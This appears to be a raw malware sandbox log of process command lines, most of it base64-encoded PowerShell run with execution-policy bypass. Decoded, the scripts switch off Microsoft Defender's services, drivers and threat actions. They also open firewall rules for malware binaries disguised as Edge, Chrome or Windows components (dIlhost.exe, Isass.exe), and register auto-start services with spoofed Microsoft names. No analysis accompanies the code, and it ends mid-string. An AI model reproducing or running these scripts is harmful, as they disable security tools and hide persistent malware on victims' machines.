AHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBIAGkAZwBoAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAKACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoACgAkAHMAdgBjAF8AbABpAHMAdAAgAD0AIABAACgAIgBXAGQATgBpAHMAUwB2AGMAIgAsACAAIgBXAGkAbgBEAGUAZgBlAG4AZAAiACwAIAAiAFMAZQBuAHMAZQAiACkACgBmAG8AcgBlAGEAYwBoACgAJABzAHYAYwAgAGkAbgAgACQAcwB2AGMAXwBsAGkAcwB0ACkAIAB7AAoAIAAgACAAIABpAGYAKAAkACgAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABzAHYAYwAiACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAaQBmACgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAHMAdgBjACIAKQAuAFMAdABhAHIAdAAgAC0AZQBxACAANAApACAAewAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAcwB2AGMAIgAgAC0ATgBhAG0AZQAgAFMAdABhAHIAdAAgAC0AVgBhAGwAdQBlACAANAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAdAByAHUAZQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgB9AAoACgAkAGQAcgB2AF8AbABpAHMAdAAgAD0AIABAACgAIgBXAGQAbgBpAHMARAByAHYAIgAsACAAIgB3AGQAZgBpAGwAdABlAHIAIgAsACAAIgB3AGQAYgBvAG8AdAAiACkACgBmAG8AcgBlAGEAYwBoACgAJABkAHIAdgAgAGkAbgAgACQAZAByAHYAXwBsAGkAcwB0ACkAIAB7AAoAIAAgACAAIABpAGYAKAAkACgAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABkAHIAdgAiACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAaQBmACgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAGQAcgB2ACIAKQAuAFMAdABhAHIAdAAgAC0AZQBxACAANAApACAAewAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAZAByAHYAIgAgAC0ATgBhAG0AZQAgAFMAdABhAHIAdAAgAC0AVgBhAGwAdQBlACAANAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAdAByAHUAZQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgB9AAoACgBpAGYAKAAkACgARwBFAFQALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAVwBpAG4ARABlAGYAZQBuAGQAKQAuAFMAdABhAHQAdQBzACAALQBlAHEAIAAiAFIAdQBuAG4AaQBuAGcAIgApACAAewAgACAAIAAKACAAIAAgACAAJABuAGUAZQBkAF8AcgBlAGIAbwBvAHQAIAA9ACAAJAB0AHIAdQBlAAoAfQAKAA==
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\e12d6a7452dd56cfb058ac5a364f0d008870b900b0da53b12c0c58f782488924.exe
"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\e12d6a7452dd56cfb058ac5a364f0d008870b900b0da53b12c0c58f782488924.exe"
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\a8eabecac5183dd92d96c18f8b08b41e60c301261e378238f88f260ec5943264.exe
"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\a8eabecac5183dd92d96c18f8b08b41e60c301261e378238f88f260ec5943264.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1BA4.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi1B92.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr1B93.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr1B94.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc TgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACIAIAAtAEcAcgBvAHUAcAAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0AUAByAG8AZwByAGEAbQAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACIAIAAtAEcAcgBvAHUAcAAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAUgB1AG4AdABpAG0AZQBCAHIAbwBvAGsAZQByAC4AZQB4AGUAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0AUAByAG8AZwByAGEAbQAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAHAAcABEAGEAdABhAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIgAgAC0AUAByAG8AZwByAGEAbQAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAHAAcABEAGEAdABhAFwAdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAFwAYQBwAHAAXABUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0AUAByAG8AZwByAGEAbQAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUAAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABUAEMAUAApACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFQAQwBQACkAIgAgAC0ARwByAG8AdQBwACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBQAHIAbwBnAHIAYQBtACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAEkAcwBhAHMAcwAuAGUAeABlACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBCAHIAYQB2AGUAIABCAHIAbwB3AHMAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIgAgAC0AUAByAG8AZwByAGEAbQAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFAAbABhAHkAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFAAbABhAHkAZQByACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFAAbABhAHkAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUwBlAHIAdgBpAGMAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAUgB1AG4AdABpAG0AZQBCAHIAbwBvAGsAZQByAC4AZQB4AGUAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBQAHIAbwBnAHIAYQBtACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAcABwAEQAYQB0AGEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACAAQwBvAG4AdAByAG8AbAAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBwAHAARABhAHQAYQBcAHQAcgBhAGYAZgBtAG8AbgBlAHQAaQB6AGUAcgBcAGEAcABwAFwAVABlAHgAdABsAG4AcAB1AHQASABvAHMAdAAuAGUAeABlACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIALQBuAGUAdAB3AG8AcgBrACAAQwBvAG4AdAByAG8AbAAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABTAHUAYgBuAGUAdAB3AG8AcgBrACAAQwBvAG4AdAByAG8AbAAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABTAHUAYgBuAGUAdAB3AG8AcgBrACAAQwBvAG4AdAByAG8AbAAiACAALQBQAHIAbwBnAHIAYQBtACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVQBzAGUAcgAwADAAQgBFAEIAcgBvAGsAZQByAC4AZQB4AGUAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABUAEMAUAApACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFQAQwBQACkAIgAgAC0ARwByAG8AdQBwACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBQAHIAbwBnAHIAYQBtACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAEkAcwBhAHMAcwAuAGUAeABlACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIARABlAHYAQQBzAHMAbwBjAE0AYQBuACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIARABlAHYAaQBjAGUAIABBAHMAcwBvAGMAaQBhAHQAaQBvAG4AIABNAGEAbgBhAGcAZQByACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIATgBnAGMAQwBwAG0AcgBTAHYAYwAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUABhAHMAcwBwAG8AcgB0ACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUABhAHMAcwBwAG8AcgB0ACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIAVABpAG0AZQBSAGEAdABpAG8AUwB2AGMAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBUAGkAbQBlACAAUgBhAHQAaQBvACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABUAGkAbQBlACAAUgBhAHQAaQBvACAAUwBlAHIAdgBpAGMAZQAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8A